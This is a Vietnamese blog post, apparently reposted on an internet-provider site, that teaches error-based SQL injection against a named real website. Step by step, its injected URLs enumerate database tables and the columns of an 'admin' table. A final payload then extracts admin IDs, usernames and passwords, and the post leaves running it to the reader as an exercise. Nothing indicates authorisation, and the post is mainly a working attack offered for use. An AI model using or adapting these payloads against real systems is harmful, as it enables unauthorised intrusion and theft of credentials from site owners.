lắp mạng cáp quang fpt thái nguyên

Khai thác web lỗi SQL cơ bản

Hic dạo này được xcross cho theo học SQL đưa ra toàn site to và đẹp, hacked thì ít mà lấy được chút thông tin nhạy cảm lại là đa sô Lần này ...

Hic dạo này được xcross cho theo học SQL đưa ra toàn site to và đẹp, hacked thì ít mà lấy được chút thông tin nhạy cảm lại là đa sô


Lần này victim là :

Link dính SQL inject nè các anh em :

Result:


Trích:
Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/danhsach_sp.asp, line 251
Quen thuộc quá phải không

Lấy hết table nha ! Ở bk2.vn các bạn có thể query bình thường để lấy thông tin tables và columns ... ngoài ra các bạn cũng có thể dùng advance SQL cho nhanh -> muốn xài được advance SQL các bạn tự tìm bug trên đó nha

Ở đây mình viết các query basic cho các bạn chưa biết gì tham khảo còn các bạn khác thì chắc dùng tool luôn chứ chả mấy khi query hands made nhỉ

Table đầu tiên nha:

Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
Kết quả :


Trích:
admin
Lấy table thứ 2 nhá:


Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('admin')))--sp_password
Kết quả là :


Trích:
customer
Table 3 nha:


Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('admin','customer')))--sp_password
Kết quả là:


Trích:
viewOrder
làm tương tự sẽ dẫn chúng ta đi hết con đường này, content tables:


Trích:
'admin/category/customer/dtproperties/feedback/logo/news/orderDetail/orders/product/subCategory/sysconstraints/syssegments/viewOrder/viewTop10/'
Hè hè thấy cái table admin là ham rùi thui lấy columns trên table này nhé


Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin'))--sp_password
Kết quả:


Trích:
ad_name
Columns tiếp theo nha:


Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin' and column_name not in('ad_name')))--sp_password
Kết quả:


Trích:
ad_pass
Tương tự ta thu được chọn gói columns của table admin


Trích:
'ad_id/ad_name/ad_pass/'
Lấy info nào


Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,ad_id),'NUL L')) %2b'/'%2bconvert(varchar,isnull(convert(varchar, ad_name),'NULL')) %2b'/'%2bconvert(varchar,isnull(convert(varchar, ad_pass),'NULL')) from admin order by ad_id asc))--sp_password
Kết quả là của các bạn. Ai làm đúng được khen

bài này chỉ dừng ở đây nếu ai làm ko ra thì kiếm tut khác cùng thể loại để đọc nha. Mình chỉ muốn các bạn mới làm quen với SQL injection học thuộc mấy cái query trên thôi.

thank for reading
Ads Here
Tên

1st,2,8051,3,AAG,1,ADS,2,ADSL,2,AIO,1,Alarm,1,Altcoin,1,AMD,2,Amplifier,4,Android,2,Android TV,3,AOE,1,APG,1,APK,3,ASIC,2,ATX,2,AVG,3,Ấp trứng,2,Bàn phím cơ,1,Bản quyền,1,baner,3,Bảng giá,5,Banggood,1,Báo giá,1,Báo hỏng,1,Bảo Mật,4,BCC,1,BCN,1,Binance,1,Bitcoin,5,Bitmex,1,Bittrex,1,BIX,1,blogger,2,BNB,1,bootrom,1,BTC,4,Build PC,1,ByteCoin,1,cable,1,Cài đặt,3,Cài Win,2,Camera,6,Camera giám sát,3,camera IP,2,Cáp quang,8,Cáp quang Cá nhân,2,Cáp quang Doanh nghiệp,1,Cấu hình máy,1,CCTV,1,Chống nước,1,Clicksense,2,Cloud,1,Cloud camera,2,Code,8,Code web,8,coin,5,Combo,1,Controller,1,Covid-19,9,Công nghệ mới,1,Cryptocurrency,26,Cung hoàng đạo,1,DAG,1,DDos,39,DEEP WEB,3,Dịch vụ FPT,4,DIY,8,Đại Từ,1,Đánh giá,5,Đào coin,6,Đâu là đúng,5,Địa chỉ,1,Điện thoại,2,Điều khiển giọng nói,1,Đồng hồ,1,Electronics,1,English,2,epon,1,ETC,1,ETH,6,Facebook,10,featured,1,Foxy,1,fpt,12,FPT camera,4,FPT internet,3,FPT Play,1,FPT Play Box,32,FPT Playbox,3,FPT Telecom,5,FPT Thái Nguyên,6,FPT TV,1,FPT TV 4K,1,FPT TVOnly,1,fshare,1,G-97D2,3,G97RG6M1,1,Game,2,Game gear,1,Game PC,2,getlink,1,Ghost,2,Ghost Windows 10,2,Ghost Windows 7,7,Gói cá nhân,2,Gói cước,2,Gói cước FPT,8,Gói Doanh Nghiệp,4,Gói kênh FPT Play,1,GPON,3,GPU,2,Hà Nội,1,Hacker,1,Hàn Quốc,1,HBO,1,HG531,2,Hi FPT,3,HiFPT,1,Học Online,1,Hot,15,houbi,3,HT,1,HTC,1,Hướng dẫn,10,Hướng dẫn FPT,8,IC555,4,ICO,3,Ifan,1,Infographic,2,internet,8,Inverter,1,IP tĩnh,1,IPTV,1,ISO,1,K+,1,KCS,1,Key,1,keypad,1,Kho Tut,59,Khuyến mại,10,kích sóng wifi,1,Kiếm tiền trên mạng,1,Kiến thức,2,Kinh nghiệm,1,Lan,1,Laptop,1,Lắp mạng,3,LED,6,leech link,1,Li-Ion,1,Light,1,LM386,1,Love,2,Lừa đảo,1,Ma kết,1,Mạch Audio,1,Mạch điện tử,1,Mạch sạc,5,Mainboard,1,Mạng chậm,1,Mạng internet,3,Mạng LAN,3,Máy ảnh,1,Máy tính,3,Meter,1,Miband,3,Microsoft,1,Minning,4,MMO,3,Mobile,3,Modem,17,Mở két,1,Music,1,Netflix,1,News,7,Ngoại ngữ,1,Nguồn,3,Nvidia,1,offer,1,Office,2,Onedrive,1,Online,1,OS,2,Others,1,Paypal,1,PC,1,PCB,1,PDF,1,Phấn Mễ,1,Phần mềm,2,Phim,1,Phòng nét,1,Photo,1,Phổ Yên,1,Phú Lương,1,Phụ nữ,1,PIC,2,Pin - Ắc qui,4,proxy,1,PUBG,1,Python,4,Remitano,3,Repeater,1,Review,4,Review FPT,2,Root,1,Router,2,Rút gọn link,1,sạc dụng phòng,1,Sạc điện thoại,1,Sàn giao dịch,2,Scam,3,Sensor,2,setup,2,smarthome,1,Softwares,5,sonoff,1,SQL,3,Super 22,2,Tài liệu,182,Tenda Nova MW3,1,Thái Nguyên,19,Thẻ visa,1,Thể thao,1,Thi công,1,Thơ thẩn,3,Thủ thuật,89,Tiền bạc,1,Tiền điện tử,3,Tin FPT,5,Tin tức,41,Tình yêu,4,Tivi box,1,Tivi Gold,1,TNUT,1,Tool,2,Tool đào coin,6,Tools,45,TP Link,1,TP-Link,3,trade coin,8,Trading,1,Transitsor,2,Trâu cày,2,Truyện,3,Truyền hình,4,Truyền hình FPT,30,Tuyển dụng,3,Tư vấn,4,TV Box,3,UG,15,USB,1,USDT,2,VGA,1,Video,1,Viettel,2,Viễn thông,1,Vinaphone,1,Virus,11,VPN,1,Web,1,wifi,17,Wifi Maketting,1,Window XP,3,Windows,4,Windows 10,6,Windows 10 Mobile,1,Windows 7,2,Xiaomi,4,XMR,2,Youtube,1,Zcash,1,Zec,1,
ltr
item
Tổng đài lắp mạng FPT Thái Nguyên |Cáp quang | Wifi | Truyền hình 4K |FPT Play Box: Khai thác web lỗi SQL cơ bản
Khai thác web lỗi SQL cơ bản
file:///C:/Documents%20and%20Settings/Garena/Desktop/SinhVienIT.Net---tong_hop_baiviet_Hacking/Hacking/sql%20injection%20select%20top%201%20column%20name_files/LOL.gif
Tổng đài lắp mạng FPT Thái Nguyên |Cáp quang | Wifi | Truyền hình 4K |FPT Play Box
https://www.xn--fptthinguyn-o7a6j.vn/2015/07/khai-thac-web-loi-sql-co-ban.html
https://www.xn--fptthinguyn-o7a6j.vn/
https://www.xn--fptthinguyn-o7a6j.vn/
https://www.xn--fptthinguyn-o7a6j.vn/2015/07/khai-thac-web-loi-sql-co-ban.html
true
8240370674769512952
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy